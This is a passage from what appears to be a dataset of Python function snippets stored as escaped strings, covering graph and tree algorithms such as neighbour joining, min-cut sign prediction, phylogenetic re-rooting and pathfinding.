G.get_edge_data(node1, nbr)['weight'] !=2]\n ## TBD: filter based on primitive constraints\n ## Right now will try to figure out S/D paths\n if len(SD_nbrs) ==0:\n logger.debug(f\"No SD paths found to traverse\")\n match_pair[node1]=node1\n elif len(SD_nbrs) ==1:\n logger.debug(f\"traversing single S/D path {SD_nbrs}\")\n match_pair[node1]=node1\n traversed.append(node1)\n compare_nodes(G,all_match_pairs,match_pair,traversed,SD_nbrs[0],SD_nbrs[0],ports_weight)\n else:\n logger.debug(f\" multiple nodes diverging {SD_nbrs}\")\n logger.debug(f\"nbr weights: {SD_nbrs} {[G.get_edge_data(node1, nbr)['weight'] for nbr in SD_nbrs ]}\")\n match_pair[node1]=node1\n traversed.append(node1)\n new_sp=sorted(set(SD_nbrs)-set(traversed))\n all_match_pairs_local={}\n for nbr1,nbr2 in combinations(new_sp, 2):\n logger.debug(f\"recursive pair call from single branch {nbr1} {nbr2}\")\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n if new_pair:\n #new_pair[nbr1]=nbr2\n all_match_pairs_local[nbr1+'_'+nbr2] = new_pair\n all_match_pairs_local={k: v for k, v in all_match_pairs_local.items() if len(v)>0}\n if len(all_match_pairs_local)==1:\n match_pair.update( all_match_pairs_local[list(all_match_pairs_local.keys())[0]])\n logger.debug(f\"found inline pair: {pprint.pformat(match_pair, indent=4)}\")\n else:\n for nbr1 in new_sp:\n if (nbr1+'_'+nbr1 not in all_match_pairs.keys()):\n logger.debug(f\"recursive single branch call from single branch {nbr1} {nbr1}\")\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr1,ports_weight)\n #filtering multiple axis of symmetries with same block, ideally they should be handled by array generation\n if new_pair:\n all_match_pairs[nbr1+'_'+nbr1] = new_pair\n logger.debug(f\"updating match pairs: {pprint.pformat(all_match_pairs, indent=4)}\")\n\n\n elif nbrs1 == nbrs2:\n logger.debug(f\"traversing converging branch\")\n match_pair[node1]=node2\n traversed+=[node1,node2]\n nbrs1=sorted(set(nbrs1)-set([node1,node2]))\n logger.debug(f\"all non traversed neighbours: {nbrs1}\")\n if len(nbrs1)==1:\n nbr1=nbr2=nbrs1[0]\n logger.debug(f\"keeping single converged branch inline {nbr1} {nbr2}\")\n compare_nodes(G,all_match_pairs,match_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n else:\n for nbr1,nbr2 in combinations_with_replacement(nbrs1,2):\n logger.debug(f\"recursive call from converged branch {nbr1} {nbr2}\")\n if nbr1+'_'+nbr2 not in all_match_pairs.keys():\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n #filtering multiple axis of symmetries with same block, ideally they should be handled by array generation\n if new_pair:\n all_match_pairs[nbr1+'_'+nbr2] = new_pair\n logger.debug(f\"updating match pairs: {pprint.pformat(all_match_pairs, indent=4)}\")\n\n\n elif compare_two_nodes(G,node1,node2,ports_weight):\n nbrs1 = sorted(set([nbr for nbr in nbrs1 if G.get_edge_data(node1, nbr)['weight'] !=2]))\n nbrs2 = sorted(set([nbr for nbr in nbrs2 if G.get_edge_data(node2, nbr)['weight'] !=2]))\n match_pair[node1]=node2\n traversed+=[node1,node2]\n logger.debug(f\"Traversing parallel branches from {node1},{node2} {nbrs1}, {nbrs2}\")\n nbrs1_wt = [G.get_edge_data(node1, nbr)['weight'] for nbr in nbrs1]\n nbrs2_wt = [G.get_edge_data(node2, nbr)['weight'] for nbr in nbrs2]\n unique_match=find_unique_matching_branches(G,nbrs1,nbrs2,ports_weight)\n if len(nbrs1)==0 or len(nbrs2)==0:\n logger.debug(f\"no new SD neihbours, returning recursion {match_pair}\")\n 
elif len(nbrs1) ==1 and len(nbrs2)==1:\n logger.debug(f\"traversing binary branch\")\n compare_nodes(G,all_match_pairs,match_pair,traversed,nbrs1.pop(),nbrs2.pop(),ports_weight)\n elif unique_match:\n logger.debug(f'traversing unique matches {unique_match}')\n match_pair[node1]=node2\n traversed+=[node1,node2]\n for nbr1,nbr2 in unique_match.items():\n logger.debug(f\"recursive call from binary {node1}:{node2} to {nbr1}:{nbr2}\")\n compare_nodes(G,all_match_pairs,match_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n elif len(nbrs1_wt)>len(set(nbrs1_wt))>1 and len(nbrs2_wt)>len(set(nbrs2_wt))>1:\n logger.debug(f\"setting new start points {node1} {node2}\")\n match_pair[node1]=node2\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n else:\n match_pair = {}\n logger.debug(f\"end all traversal from binary branch {node1} {node2}\")\n\n else:\n match_pair = {}\n logger.debug(f\"end of recursion branch, matches {match_pair}\")", "def flep(tree_adj, nodes_sign, edge_weight, root, return_fullcut_info=False):\n # start = clock()\n assert isinstance(tree_adj, dict)\n if not (isinstance(nodes_sign, tuple) and len(nodes_sign) == 2):\n nodes_sign = (nodes_sign, nodes_sign)\n if root in nodes_sign[0]:\n cutp, cutn = (MAX_WEIGHT, 0) if nodes_sign[0][root] < 0 else (0, MAX_WEIGHT)\n val_1 = nodes_sign[0][root]*MAX_WEIGHT\n cutp_, cutn_ = (MAX_WEIGHT, 0) if nodes_sign[1][root] < 0 else (0, MAX_WEIGHT)\n val_2 = nodes_sign[1][root]*MAX_WEIGHT\n return (val_1, val_2), {}, {root: (True, -1, cutp, cutn, cutp_, cutn_)}\n stack = []\n status = defaultdict(lambda: (False, -1, 0, 0, 0, 0))\n stack.append(root)\n while stack:\n v = stack.pop()\n if v >= 0:\n discovered, pred, cutp, cutn, cutp_, cutn_ = status[v]\n else:\n v = -(v+100)\n discovered, pred, cutp, cutn, cutp_, cutn_ = status[v]\n for child in tree_adj[v]:\n if status[child][1] != v:\n continue\n eweight = edge_weight[(child, v) if child < v else (v, child)]\n _, _, childp, childn, childp_, childn_ = status[child]\n cutp += min(childp, childn + eweight)\n cutn += min(childn, childp + eweight)\n cutp_ += min(childp_, childn_ + eweight)\n cutn_ += min(childn_, childp_ + eweight)\n status[v] = (discovered, pred, cutp, cutn, cutp_, cutn_)\n # print('{}: (+: {}, -: {})'.format(v, cutp, cutn))\n if v == root:\n # FLEP_CALLS_TIMING.append(clock() - start)\n intermediate = {}\n if return_fullcut_info:\n intermediate = {n: vals[2:6]\n for n, vals in status.items()\n if vals[0] and n not in nodes_sign[0]}\n return (((cutn - cutp), (cutn_ - cutp_)), intermediate, status)\n\n if not discovered:\n status[v] = (True, pred, cutp, cutn, cutp_, cutn_)\n if v in nodes_sign[0]:\n # don't go beyond revealed nodes\n continue\n stack.append(-(v+100))\n for w in tree_adj[v]:\n discovered, pred, cutp, cutn, cutp_, cutn_ = status[w]\n if pred == -1 and w != root:\n if w in nodes_sign[0]:\n cutp, cutn = (MAX_WEIGHT, 0) if nodes_sign[0][w] < 0 else (0, MAX_WEIGHT)\n cutp_, cutn_ = (MAX_WEIGHT, 0) if nodes_sign[1][w] < 0 else (0, MAX_WEIGHT)\n status[w] = (discovered, v, cutp, cutn, cutp_, cutn_)\n if not discovered:\n stack.append(w)\n assert False, root", "def CreateTree(d,list_L):\r\n \r\n d_new = defaultdict(dict)\r\n \r\n #labels corresponding to minimum evolutionary distance in Matrix\r\n a,b = minInDict(d)\r\n\r\n n = ['(',a,',',b,')']\r\n new_cluster = ''.join(n)\r\n \r\n #remove the entries in newly formed cluster from our list\r\n for k in list_L:\r\n if k == a:\r\n 
list_L.remove(k)\r\n break\r\n for p in list_L:\r\n if p == b:\r\n list_L.remove(p)\r\n break\r\n\r\n #to remove an existing cluster with those entries\r\n for j in list_L:\r\n if a in j or b in j:\r\n list_L.remove(j)\r\n\r\n #Base case of our recursive function \r\n if len(d) == 1:\r\n return new_cluster\r\n\r\n #calculating distances from our new cluster(eg: (a,b))to other labels/clusters\r\n for q in list_L:\r\n \r\n if b in d:\r\n if q in d[a] and q in d[b]:\r\n d_new[new_cluster][q] = (d[a][q] + d[b][q])/2\r\n continue\r\n if q in d:\r\n if b in d[q] and q in d[a]:\r\n d_new[new_cluster][q] = (d[a][q] + d[q][b])/2\r\n continue\r\n if b in d:\r\n if a in d[q] and q in d[b]:\r\n d_new[new_cluster][q] = (d[q][a] + d[b][q])/2\r\n continue\r\n if a in d[q] and b in d[q]:\r\n d_new[new_cluster][q] = (d[q][a] + d[q][b])/2\r\n \r\n list_L.insert(0,new_cluster)\r\n \r\n #deleting row and column corresponding to a and b\r\n del d[a]\r\n if b in d:\r\n del d[b]\r\n \r\n for p in d:\r\n for q in d[p]:\r\n if q != b and q != a:\r\n d_new[p][q] = d[p][q]\r\n\r\n return CreateTree(d_new,list_L)", "def fractionalPoints(totalNodeList, recNodeList, fracPoints):\n\n avPoint = averagePoints(recNodeList)\n\n for i in range(0, fracPoints):\n closestPoint = closest_node(avPoint, totalNodeList) #Finds closest point\n totalNodeList.remove(closestPoint)\n recNodeList.append(closestPoint)\n\n printProgressBar(i, fracPoints) \n\n return recNodeList", "def get_nodes(final_node, discard_params=True):\n var_nodes = []\n func_nodes = []\n seen_ids = set()\n\n # We re-do backward var iter here, with some changes\n cand_funcs = []\n seen = set()\n \n def add_cand(cand):\n if cand not in seen:\n # Negate since heapq is min-heap\n heapq.heappush(cand_funcs, (-cand.rank, len(seen), cand))\n seen.add(cand)\n \n add_cand(final_node.creator_node)\n seen_ids.add(id(final_node))\n \n while cand_funcs:\n _,_,func = heapq.heappop(cand_funcs)\n inputs = func.inputs\n target_inputs = [x for x in inputs if x.requires_grad]\n if not target_inputs:\n continue\n \n if id(func) not in seen_ids:\n func_nodes += [func]\n seen_ids.add(id(func))\n \n for x in target_inputs:\n if discard_params and x.creator_node is None:\n if isinstance(x.get_variable_or_none(), Parameter):\n continue # Discard param dead ends\n \n if id(x) not in seen_ids:\n var_nodes += [x]\n seen_ids.add(id(x))\n \n if x.creator_node is not None:\n add_cand(x.creator_node)\n \n return var_nodes, func_nodes", "def prepare_initial_nodes(x_start, x_end, nodes_y):\n nodes_x = [float(x_start + ((x_end - x_start) / (len(nodes_y) - 1)) * i) for i in range(0, len(nodes_y))]\n nodes_y = [float(y) for y in nodes_y]\n print(nodes_x)\n print(nodes_y)\n nodes = list(zip(nodes_x, nodes_y))\n return nodes", "def _compute_newton_step(lambdas, p_norm, w_norm):\n return lambdas.candidate + (p_norm / w_norm) ** 2 * (p_norm - 1)", "def next_node_dfs(search_state, last_node_is_ok):\n log_T, initial_state, min_score, max_depth, maxtraversals, node, node_idx, it, order, score, sub_info = search_state\n min_score = float(min_score) # make sure numba knows this is a float (otherwise, sometimes, it doesn't (bug in numba))\n n_states = log_T.shape[0]\n if it == maxtraversals:\n assert False, \"Number of traversals exceeded\"\n while True:\n # next node ##\n # try adding a value at the end\n for next_idx, next_state in enumerate(order[node[-1]]):\n if last_node_is_ok and min_score <= score + log_T[node[-1], next_state] and len(node) < max_depth \\\n and syntax_check(np.array(node + 
[next_state]), sub_info, partial=True):\n node.append(next_state)\n node_idx.append(next_idx)\n break\n # adding a value at the end failed, so we are a leaf\n else:\n for p in xrange(len(node) - 1, -1, -1):\n if node_idx[p] != n_states - 1: # find where within the node to increase (and discard all others after)\n old_idx = node_idx[p]\n del node_idx[p:]\n del node[p:]\n node_idx.append(old_idx + 1)\n prev_state = node[p - 1] if p > 0 else initial_state\n node.append(order[prev_state, node_idx[p]])\n break\n else:\n search_state = log_T, initial_state, min_score, max_depth, maxtraversals, list(node), list(node_idx), it, order, score, sub_info\n return [-1], score, search_state # end of the generator, can't increase even the root\n last_node_is_ok = True # We can now make progress again, regardless of whether we could at the beginning\n it += 1\n # score and return current node if adequate\n score = log_T[initial_state, node[0]]\n for p in xrange(1, len(node)):\n score += log_T[node[p - 1], node[p]]\n if min_score <= score and syntax_check(np.array(node), sub_info, partial=False):\n search_state = log_T, initial_state, min_score, max_depth, maxtraversals, list(node), list(node_idx), it, order, score, sub_info\n return list(node), score, search_state # the invocation to list here is to make a copy, don't remove!", "def getNodesAndDistances():\n\n\tglobal width, height\n\n\t# First we generate the list\n\n\tprint \"\\tGetting node list...\"\n\t\n\tnodeDict = {}\n\n\tfor y in range(height):\n\t\tfor x in range(width):\n\t\t\ttheType = getSquare(x, y)\n\n\t\t\tprint \"\\t\\tGetting list for node (%d, %d) of type %d...\" % (x, y, theType)\n\n\t\t\ttempList = getNodeList(x, y, theType)\n\n\t\t\tif tempList == []:\n\t\t\t\tprint \"\\t\\t\\tNo nodes here.\"\n\t\t\telse:\n\t\t\t\tfor i in range(len(tempList)):\n\t\t\t\t\tnode = tempList[i]\n\t\t\t\t\tnodeName = node[0]\n\t\t\t\t\tnodeDict[nodeName] = node[1:]\t# Everything but the first element\n\t\t\t\t\tprint \"\\t\\t\\tAdded node '%s'...\" % nodeName\n\n\tprint \"\\tDone getting node list (%d nodes)...\" % (len(nodeDict.keys()))\n\tprint \"\"\n\n\t# Now that we've got that, we get a list of pairs\n\n\tpairList = getPairList(nodeDict)\n\n\t# Now we calculate the distance between every pair of nodes that connect\n\n\tprint \"\"\n\tprint \"\\tCreating dictionary of distances between connected nodes...\"\n\n\tdistanceDict = {}\n\n\tfor tuple in pairList:\n\t\t(nodeA, nodeB) = tuple\n\t\tprint \"\\t\\tCalculating distance between '%s' and '%s'...\" % (nodeA, nodeB)\n\t\tdistance = distanceBetween(nodeA, nodeB, nodeDict)\n\t\tpairName = \"%s%s\" % (nodeA, nodeB)\n\t\tdistanceDict[pairName] = distance\n\t\tprint \"\\t\\t\\tDistance was %f.\" % (distance)\n\n\tprint \"\\tDone creating dictionary of node distances (%d pairs).\" % (len(distanceDict.keys()))\n\n\treturn nodeDict, distanceDict", "def perform(self, node, inputs, outputs):\r\n x = inputs[0]\r\n L = inputs[1]\r\n dz = inputs[2]\r\n dx = outputs[0]\r\n N = x.shape[0]\r\n if self.lower:\r\n F = numpy.tril(dz)\r\n for k in xrange(N - 1, -1, -1):\r\n for j in xrange(k + 1, N):\r\n for i in xrange(j, N):\r\n F[i, k] -= F[i, j] * L[j, k]\r\n F[j, k] -= F[i, j] * L[i, k]\r\n for j in xrange(k + 1, N):\r\n F[j, k] /= L[k, k]\r\n F[k, k] -= L[j, k] * F[j, k]\r\n F[k, k] /= (2 * L[k, k])\r\n else:\r\n F = numpy.triu(dz)\r\n M = N - 1\r\n for k in xrange(N - 1, -1, -1):\r\n for j in xrange(k + 1, N):\r\n for i in xrange(j, N):\r\n F[k, i] -= F[j, i] * L[k, j]\r\n F[k, j] -= F[j, i] * L[k, i]\r\n for j 
in xrange(k + 1, N):\r\n F[k, j] /= L[k, k]\r\n F[k, k] -= L[k, j] * F[k, j]\r\n F[k, k] /= (2 * L[k, k])\r\n dx[0] = F", "def add_nodes(self, new_nodes):\n self.nodes = self._nodes + ensure_list(new_nodes)\n for nd in ensure_list(new_nodes):\n self.predecessors[nd.name] = []\n self.successors[nd.name] = []\n if self._sorted_nodes is not None:\n # starting from the previous sorted list, so is faster\n self.sorting(presorted=self.sorted_nodes + ensure_list(new_nodes))", "def balances_to_path_nodes(balances_data, workers=1, hash_func=pedersen_hash):\n height = balances_data['tree_height']\n vaults_data = balances_data['vaults_data']\n balances = [(vault['vault_id'], vault) for vault in vaults_data]\n\n event_loop = asyncio.new_event_loop()\n\n with parallel_hash(hash_func, workers) as async_hash_func:\n try:\n res = event_loop.run_until_complete(\n calc_nodes(height, balances, calc_zero_nodes(height), 1, async_hash_func)\n )\n return res\n finally:\n event_loop.close()", "def updateClusters(LLE_node_vals, switch_penalty=1):\r\n (T, num_clusters) = LLE_node_vals.shape\r\n future_cost_vals = np.zeros(LLE_node_vals.shape)\r\n\r\n # compute future costs\r\n for i in range(T-2, -1, -1):\r\n j = i+1\r\n indicator = np.zeros(num_clusters)\r\n future_costs = future_cost_vals[j, :]\r\n lle_vals = LLE_node_vals[j, :]\r\n for cluster in range(num_clusters):\r\n total_vals = future_costs + lle_vals + switch_penalty\r\n total_vals[cluster] -= switch_penalty\r\n future_cost_vals[i, cluster] = np.min(total_vals)\r\n\r\n # compute the best path\r\n path = np.zeros(T)\r\n\r\n # the first location\r\n curr_location = np.argmin(future_cost_vals[0, :] + LLE_node_vals[0, :])\r\n path[0] = curr_location\r\n\r\n # compute the path\r\n for i in range(T-1):\r\n j = i+1\r\n future_costs = future_cost_vals[j, :]\r\n lle_vals = LLE_node_vals[j, :]\r\n total_vals = future_costs + lle_vals + switch_penalty\r\n total_vals[int(path[i])] -= switch_penalty\r\n\r\n path[i+1] = np.argmin(total_vals)\r\n\r\n # return the computed path\r\n return path", "def evaluate_cuts(base_tree, node):\n config = Configuration.config # Collect configuration\n\n N = config.normals # Collect predefined set of normal vectors\n N = np.append(N, node.auxiliary_normals, axis=0) # Append partition's bounding-box-aligned vectors as normals\n N = np.unique(np.round(N, 3), axis=0) # Return sorted unique elements of input array_like\n\n trees = []\n for i in range(N.shape[0]):\n trees_of_this_normal = [] # start a list of trees for splits along this normal\n normal = N[i] # current normal\n for plane in bsp_tree.get_planes(node.part, normal): # iterate over all valid cutting planes for the node\n tree, result = bsp_tree.expand_node(base_tree, node.path, plane) # split the node using the plane\n if tree: # only keep the tree if the split is successful\n trees_of_this_normal.append(tree)\n logger.debug(f\"normal index: {i}, origin: {plane[0]}, normal: {plane[1]}, result: {result}\")\n if len(trees_of_this_normal) == 0: # avoid empty list errors during objective function evaluation\n logger.info(f\"normal index: {i}, trees for normal: {len(trees_of_this_normal)}, total trees: {len(trees)}\")\n continue\n # go through each objective function, evaluate the objective function for each tree in this normal's\n # list, fill in the data in each tree object in the list\n for evaluate_objective_func in objectives.values():\n evaluate_objective_func(trees_of_this_normal, node.path)\n trees += trees_of_this_normal\n logger.info(f\"normal index: {i}, trees for 
normal: {len(trees_of_this_normal)}, total trees: {len(trees)}\")\n\n # go through the list of trees, best ones first, and throw away any that are too similar to another tree already\n # in the result list\n result_set = []\n for tree in sorted(trees, key=lambda x: x.objective):\n if tree.sufficiently_different(node, result_set):\n result_set.append(tree)\n logger.info(f\"{len(result_set)} valid trees\")\n return result_set", "def fn(n):\n if n == 1: return [TreeNode()]\n ans = []\n for nn in range(1, n, 2): \n for left in fn(nn):\n for right in fn(n-1-nn): \n ans.append(TreeNode(left=left, right=right))\n return ans", "def batch_predict(tree_adj, training_signs, edge_weight):\n # since shazoo use the revealed signs as-is, it's ok to use the same name\n training_signs, l2_values, rta_signs = training_signs\n all_nodes_to_predict = set(tree_adj) - set(training_signs)\n logging.debug('batch_predict has %d nodes to predict', len(all_nodes_to_predict))\n methods = ['l2cost', 'rta', 'shazoo']\n # fields are current_closest_hinge, current_sign, current_dst_to_closest_hinge\n node_predictions = {m: defaultdict(lambda: (None, None, 2e9)) for m in methods}\n hinge_value = {m: {} for m in methods}\n total_iter = 0\n while all_nodes_to_predict:\n some_root_of_a_border_tree = next(iter(all_nodes_to_predict))\n hinge_nodes, border_tree_nodes = find_hinge_nodes(tree_adj, edge_weight, training_signs,\n some_root_of_a_border_tree,\n with_visited=True)\n unmarked = border_tree_nodes - hinge_nodes\n for u in hinge_nodes:\n if u in hinge_value['shazoo']:\n continue\n vals, _, status = flep(tree_adj, (training_signs, rta_signs), edge_weight, u)\n hinge_value['shazoo'][u] = sgn(vals[0])\n hinge_value['rta'][u] = sgn(vals[1])\n if not USE_SCIPY:\n continue\n border_tree = build_border_tree_from_mincut_run(status, edge_weight)\n _, E, El, leaves_sign, _, _ = border_tree\n L = {u: l2_values[u] for u in leaves_sign}\n mapped_E, mapped_El_L, mapping = preprocess_edge_and_leaves(E, El, L)\n val = solve_by_zeroing_derivative(mapped_E, mapped_El_L, mapping, L,\n reorder=False)[0][u]\n hinge_value['l2cost'][u] = sgn(val)\n predicted_in_that_border_tree = set()\n inner_iter = 0\n # to avoid the same fork being picked again and again\n unmarked.add(some_root_of_a_border_tree)\n while unmarked:\n one_to_predict = next(iter(unmarked))\n hinge_tree = get_hinge_tree(one_to_predict, tree_adj, hinge_nodes)\n other_predicted = set()\n for h, h_val in iteritems(hinge_value['shazoo']):\n if h not in hinge_tree:\n continue\n predicted = propagate_hinge(hinge_tree, h, h_val, node_predictions['shazoo'],\n edge_weight)\n for u in predicted:\n prediction_info = node_predictions['shazoo'][u]\n used_hinge = prediction_info[0]\n node_predictions['rta'][u] = (used_hinge, hinge_value['rta'][used_hinge],\n prediction_info[2])\n if not USE_SCIPY:\n continue\n node_predictions['l2cost'][u] = (used_hinge, hinge_value['l2cost'][used_hinge],\n prediction_info[2])\n other_predicted.update(predicted)\n predicted_in_that_border_tree.update(other_predicted)\n unmarked -= other_predicted\n inner_iter += 1\n if inner_iter > len(tree_adj):\n import time\n logging.critical('batch predict failed in the inner loop')\n persistent.save_var('__fail_{}.my'.format(int(time.time())), (tree_adj, (training_signs, l2_values, rta_signs), edge_weight))\n raise RuntimeError('batch predict failed in the inner loop')\n all_nodes_to_predict -= predicted_in_that_border_tree\n total_iter += 1\n if total_iter > len(tree_adj):\n import time\n logging.critical('batch predict 
failed in the outer loop')\n persistent.save_var('__fail_{}.my'.format(int(time.time())), (tree_adj, (training_signs, l2_values, rta_signs), edge_weight))\n raise RuntimeError('batch predict failed in the outer loop')\n logging.debug('batch_predict has actually predicted %d nodes', len(node_predictions) - len(training_signs))\n return {m: {u: v[1] for u, v in iteritems(node_predictions[m]) if u not in training_signs}\n for m in methods}", "def nj(nodeL,distD):\n while len(nodeL) > 2:\n nodeA,nodeB = bestPair(nodeL,distD)\n bA, bB = branchLength(nodeA,nodeB,nodeL,distD)\n newNode= mergeNodes(nodeA, nodeB, bA, bB)\n updateDistances(nodeA,nodeB,newNode,nodeL,distD)\n nodeL.remove(nodeA)\n nodeL.remove(nodeB)\n nodeL.append(newNode)\n return terminate(nodeL,distD)", "def push_nodes_with_binary(self, b, step_ratio=0.1, niter=0):\n lid = list(self._data[:, 0])\n lpid = list(self._data[:, -2])\n t_data = self._data.copy()\n\n children_idx = {\n pid: [i for i, p in enumerate(lpid) if p == t_data[i, 0]] for pid in lpid\n }\n\n for _ in range(niter):\n for i in range(t_data.shape[0]):\n pid, radius, (x, y, z) = (\n int(t_data[i, -2]),\n t_data[i, -3],\n t_data[i, 2:5],\n )\n cidx = children_idx[pid]\n if pid != i and pid in lid and len(cidx) <= 1:\n px, py, pz = t_data[t_data[:, 0] == pid, 2:5][0]\n vnorm = norm_vec(np.asarray([x - px, y - py, z - pz]))\n\n if len(cidx) == 1:\n cx, cy, cz = t_data[cidx[0], 2:5]\n vnorm = (\n vnorm + norm_vec(np.asarray([cx - x, cy - y, cz - z]))\n ) / 2\n if all([v == 0 for v in vnorm]):\n continue\n\n pt = np.asarray([x, y, z])\n p_vectors = get_perpendicular_vectors(pt, vnorm)\n p_distances = [\n get_distance_to_boundary(pt, pvec, b) for pvec in p_vectors\n ]\n dx, dy, dz = np.sum(\n [pv * pd for pv, pd in zip(p_vectors, p_distances)], 0\n )\n\n # Constrain the displacement by the node radii\n tx = x + dx * step_ratio\n ty = y + dy * step_ratio\n tz = z + dz * step_ratio\n dist = (\n (tx - self._data[i, 2]) ** 2\n + (ty - self._data[i, 3]) ** 2\n + (tz - self._data[i, 4]) ** 2\n ) ** 0.5\n if dist <= radius / 2:\n t_data[i, 2] = tx\n t_data[i, 3] = ty\n t_data[i, 4] = tz\n else:\n pass\n self._data = t_data", "def _compute_ptdfs(self):\n z = self._compute_z()\n s = np.zeros([self.n_nodes, self.n_nodes, self.n_nodes])\n for k in range(self.n_nodes):\n for L in range(self.n_nodes):\n for i in range(self.n_nodes):\n if k == 0 and L != 0:\n s[k, L, i] = -1 * z[L-1, i-1]\n elif k != 0 and L == 0:\n s[k, L, i] = z[k-1, i-1]\n elif k != 0 and L != 0 and k != L:\n s[k, L, i] = z[k-1, i-1] - z[L-1, i-1]\n return s", "def root_nodes(self, node1, node2, distance):\n if node1 == node2.parent:\n upper_node = node1\n lower_node = node2\n upper_dist, lower_dist = distance, lower_node.branch - distance\n elif node2 == node1.parent:\n upper_node = node2\n lower_node = node1\n upper_dist, lower_dist = lower_node.branch - distance, distance\n else:\n raise PhyloValueError('root_nodes() requires that one of the given nodes is the parent of the other.')\n if len(self.root.children) <= 1:\n raise PhyloValueError('cannot re-root a tree where the existing root has one or no children.')\n elif len(self.root.children) == 2:\n if upper_node == self.root:\n # Just need to adjust branch lengths\n root_child = self.root.children[1] if self.root.children[0] == lower_node else self.root.children[0]\n root_child.branch += upper_dist\n lower_node.branch = lower_dist\n else:\n upper_path = self.find_path_to_root(upper_node)\n # Process the old root child after removing the root:\n root_child = 
self.root.children[1] if self.root.children[0] == upper_path[1] else self.root.children[0]\n root_child.branch += upper_path[1].branch\n root_child.parent = upper_path[1]\n upper_path[1].children.append(root_child)\n # Process nodes between root and upper_node:\n prev_node = upper_path[1]\n for next_node in upper_path[2:]:\n prev_node.children.remove(next_node)\n prev_node.parent = next_node\n next_node.children.append(prev_node)\n prev_node.branch = next_node.branch\n prev_node = next_node\n # Process upper_node, lower_node, and the new root\n upper_node.parent = lower_node.parent = self.root\n upper_node.children.remove(lower_node)\n self.root.children = [node1, node2] # Keeps the argument order\n upper_node.branch = upper_dist\n lower_node.branch = lower_dist\n else: # If the root has 3 children it means it's an unrooted tree\n new_root = self.new_tree_node()\n new_root.branch = self.root.branch # Transfers any existing root branch\n if upper_node != self.root:\n upper_path = self.find_path_to_root(upper_node)\n prev_node = self.root\n for next_node in upper_path[1:]:\n prev_node.children.remove(next_node)\n prev_node.parent = next_node\n next_node.children.append(prev_node)\n prev_node.branch = next_node.branch\n prev_node = next_node\n upper_node.children.remove(lower_node)\n upper_node.branch = upper_dist\n lower_node.branch = lower_dist\n new_root.children.append(upper_node)\n new_root.children.append(lower_node)\n upper_node.parent = lower_node.parent = new_root\n self.root = new_root\n self.process_tree_nodes()", "def sub_run1(new_node, distance):\n optimal_value[0] = optimal_value[0] + distance\n\n PL = get_node_points(new_node.left)\n P = get_node_points(new_node)\n PR = get_node_points(new_node.right)\n\n line1 = matrix.linear_eq((PL, P))\n line2 = matrix.linear_eq((PR, P))\n\n line1[2] = line1[2] * (-1)\n line2[2] = line2[2] * (-1)\n\n linear_list.append((new_node.left, new_node, line1))\n linear_list.append((new_node, new_node.right, line2))\n\n remove_eq(new_node)\n tspturtle.tsp_draw(PL, P, PR)\n\n remove(new_node)", "def neighborJoining(distances):\n\n tree = {}\n\n while(len(distances.keys()) > 2):\n\n r = calcRs(distances)\n M = makeMMatrix(distances, r)\n\n smallest = 10000\n smallestKey = (\"\",\"\")\n\n #Find nearest neighbors\n for key in M.keys():\n for subkey in M[key].keys():\n if M[key][subkey] < smallest:\n smallest = M[key][subkey]\n smallestKey = (key, subkey)\n\n #Add new node and update distances to rest of tree\n newname = smallestKey[0] + \"-\" + smallestKey[1]\n distances[newname] = {}\n tree[smallestKey[0]] = {}\n tree[smallestKey[1]] = {}\n dij = distances[smallestKey[0]][smallestKey[1]]\n for key in M.keys():\n if key in smallestKey:\n continue\n distances[newname][key] = .5*(distances[smallestKey[0]][key] \\\n + distances[smallestKey[1]][key] - dij)\n distances[key][newname] = distances[newname][key]\n\n #Update distances to parents of node\n dik = (dij + r[smallestKey[0]] - r[smallestKey[1]])/2\n tree[smallestKey[0]][newname] = dik\n tree[smallestKey[1]][newname] = dij-dik\n detachDict(distances, smallestKey[0], smallestKey[1])\n\n #Connect final two nodes\n tree[distances.keys()[0]] = {}\n tree[distances.keys()[0]][distances[distances.keys()[0]].keys()[0]] =\\\n distances[distances.keys()[0]][distances[distances.keys()[0]].keys()[0]] \n return tree", "def compute_operator(self, snapshots):\n\n # To avoid recursion function, use FIFO list to simulate the tree\n # structure\n data_queue = [snapshots.copy()]\n\n current_bin = 0\n while data_queue:\n 
Xraw = data_queue.pop(0)\n\n n_samples = Xraw.shape[1]\n\n step = max(1, int(np.floor(old_div(n_samples, self._nyq))))\n Xsub = Xraw[:, ::step]\n Xc = Xsub[:, :-1]\n Yc = Xsub[:, 1:]\n\n Xc, Yc = compute_tlsq(Xc, Yc, self._tlsq_rank)\n\n rho = old_div(float(self._max_cycles), n_samples)\n sub_operator = SubMrDMDOperator(svd_rank=self._svd_rank,\n eigs_divider=2. * np.pi * step, rho=rho)\n sub_operator.compute_operator(Xc, Yc)\n\n modes = sub_operator.modes\n eigs = sub_operator.eigenvalues\n Atilde = sub_operator.as_numpy_array\n b = sub_operator.compute_sub_amplitudes(Xc, self._opt)\n\n #---------------------------------------------------------------\n # DMD Amplitudes and Dynamics\n #---------------------------------------------------------------\n Vand = np.vander(np.power(eigs, old_div(1., step)), n_samples, True)\n\n Psi = (Vand.T * b).T\n\n self._modes.append(modes)\n self._b.append(b)\n self._Atilde.append(Atilde)\n self._eigenvalues.append(eigs)\n self._nsamples.append(n_samples)\n self._steps.append(step)\n\n if Xraw.dtype == 'float64':\n Xraw -= modes.dot(Psi).real\n else:\n Xraw -= modes.dot(Psi)\n\n if current_bin < 2**(self._max_level - 1) - 1:\n current_bin += 1\n half = int(np.ceil(old_div(Xraw.shape[1], 2)))\n data_queue.append(Xraw[:, :half])\n data_queue.append(Xraw[:, half:])\n else:\n current_bin += 1", "def solve(self):\n smallest_f = self.get_smallest_f_cost_unvisited_node()\n smallest_f_node = smallest_f[0]\n\n if smallest_f[1] > 1:\n current_node = self.get_smallest_h_cost_unvisited_node()\n else:\n current_node = smallest_f_node\n if current_node.f_cost == self.inf:\n return\n\n self.set_h_cost(current_node)\n self.unvisited_pos.remove(current_node.pos)\n self.visited_pos.append(current_node.pos)\n neighbours = algo_utils.get_neighbours(current_node, self.grid, self.wall_pos)\n\n for neigh in neighbours:\n neighbour_dist = 